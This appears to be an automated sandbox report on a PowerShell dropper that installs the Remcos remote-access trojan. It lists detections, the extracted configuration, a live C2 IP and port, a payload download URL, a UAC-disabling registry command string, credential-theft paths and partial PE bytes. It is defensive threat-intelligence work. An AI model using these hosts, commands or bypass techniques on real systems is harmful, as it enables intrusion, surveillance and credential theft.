Edit tour

Windows Analysis Report
MKBOY.ps1

Overview

General Information

Sample name:	MKBOY.ps1
Analysis ID:	1638291
MD5:	f3848b1d0ad73445ff208123c109b3a3
SHA1:	3aa9884c5877cd84a2a5695bb85d0c1d465762e5
SHA256:	9cf1fdb10c69abf321636907171418f4ca79917c2a280fb1d7216fcb99fd2339
Tags:	ps1user-TornadoAV_dev
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionalty to change the wallpaper

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 2380 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: D3B5CB4E3CE38BCA8399A8E4A3E6B80E)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: D3B5CB4E3CE38BCA8399A8E4A3E6B80E)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: D3B5CB4E3CE38BCA8399A8E4A3E6B80E)

notepad.exe (PID: 6260 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\MKBOY.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

svchost.exe (PID: 1336 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DJTZHJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3371811776.0000000000481000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
Process Memory Space: powershell.exe PID: 6952	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xfc581:$b1: ::WriteAllBytes( 0x172603:$b1: ::WriteAllBytes( 0xfc5aa:$b2: ::FromBase64String( 0x17262c:$b2: ::FromBase64String( 0x12368c:$s1: -join 0x123741:$s1: -join 0x1239ac:$s1: -join 0x123f6d:$s1: -join 0x123f9f:$s1: -join 0x123fe7:$s1: -join 0x124014:$s1: -join 0x124417:$s1: -join 0x12447f:$s1: -join 0x1244c0:$s1: -join 0x124515:$s1: -join 0x12585d:$s1: -join 0x12a327:$s1: -join 0x15a0cd:$s1: -join 0x15addc:$s1: -join 0x1b00ed:$s1: -join 0x1bd1c2:$s1: -join
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x11d6a:$a1: Remcos restarted by watchdog! 0x123bf:$a3: %02i:%02i:%02i:%03i 0x127fc:$a3: %02i:%02i:%02i:%03i
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x81e68:$s1: CoGetObject 0x88878:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5576, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1", ProcessId: 6952, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5576, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\MKBOY.ps1", ProcessId: 6952, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1336, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 71 10 FB 16 47 F6 DD F5 0F 09 E9 47 A6 91 C8 B9 5F 40 32 96 0F E6 26 F6 4B 07 59 D2 07 F5 0E 40 6A 42 5D BE A8 C2 D4 79 5B AD 49 FD B4 ED C9 0A 85 66 7F B3 E2 E6 54 88 77 3B 16 9C 30 FA 91 E8 A7 AA 2B FA BA F6 AF 38 5E 2D 30 30 D6 5B 09 BE 00 D9 AF 9F 3E 9F 0C 5B 16 61 B7 3E 8D 3A 0C 25 19 BC 0B C1 7B 12 90 59 6A 4E 63 89 AC 66 67 1F 62 3A 14 56 2C D6 F6 65 EB 61 2B 77 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessId: 3064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-DJTZHJ\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:04:19.807881+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.9	49684	198.23.227.212	32583	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:04:18.216547+0100	2019714	2	Potentially Bad Traffic	192.168.2.9	49683	176.65.144.3	80	TCP

ET MALWARE UPX compressed file download possible malware

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:04:18.451855+0100	2001046	3	Misc activity	176.65.144.3	80	192.168.2.9	49683	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:04:21.195069+0100	2803304	3	Unknown Traffic	192.168.2.9	49685	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://176.65.144.3/dev/muk.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Avira: detection malicious, Label: TR/Injector.kdlmm
Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll	Avira: detection malicious, Label: TR/Injector.kdlmm

Found malware configuration

Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["198.23.227.212:32583:1"], "Assigned name": "Yavakosa", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "yavascript.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-DJTZHJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "xenor", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dll	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: MKBOY.ps1	Virustotal: Detection: 42%			Perma Link
Source: MKBOY.ps1	ReversingLabs: Detection: 26%

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

5_2_00433B64

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00406ABC _wcslen,CoGetObject,

5_2_00406ABC

Source:	Binary string: SFSGSEERE.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000000.897574793.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr
Source:	Binary string: SFSGSEERE.pdbXFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000000.897574793.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	5_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	5_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0044EA89 FindFirstFileExA,FindClose,FindNextFileA,	5_2_0044EA89
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	5_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	5_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	5_2_00407EDD

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

5_2_00407357

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4x nop then jmp 023852DAh		3_2_02385188
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 4x nop then jmp 02385330h		3_2_02385188

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49684 -> 198.23.227.212:32583

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 198.23.227.212

Source: global traffic

TCP traffic: 192.168.2.9:49684 -> 198.23.227.212:32583

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 10:04:18 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 10 Mar 2025 22:02:22 GMTETag: "3ae00-63004206fd499"Accept-Ranges: bytesContent-Length: 241152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 6a c8 65 08 0b a6 36 08 0b a6 36 08 0b a6 36 bc 97 57 36 1b 0b a6 36 bc 97 55 36 a3 0b a6 36 bc 97 54 36 16 0b a6 36 01 73 22 36 09 0b a6 36 96 ab 61 36 0a 0b a6 36 5a 63 a3 37 36 0b a6 36 5a 63 a2 37 29 0b a6 36 5a 63 a5 37 12 0b a6 36 01 73 35 36 13 0b a6 36 08 0b a7 36 4f 0a a6 36 a5 62 af 37 6c 0b a6 36 a5 62 59 36 09 0b a6 36 a5 62 a4 37 09 0b a6 36 52 69 63 68 08 0b a6 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2b 43 bc 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 10 00 60 03 00 00 50 00 00 00 d0 04 00 e0 3b 08 00 00 e0 04 00 00 40 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 08 00 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 86 08 00 bc 02 00 00 00 40 08 00 20 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 3d 08 00 18 00 00 00 c4 3d 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 d0 04 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 60 03 00 00 e0 04 00 00 60 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 50 00 00 00 40 08 00 00 4a 00 00 00 64 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 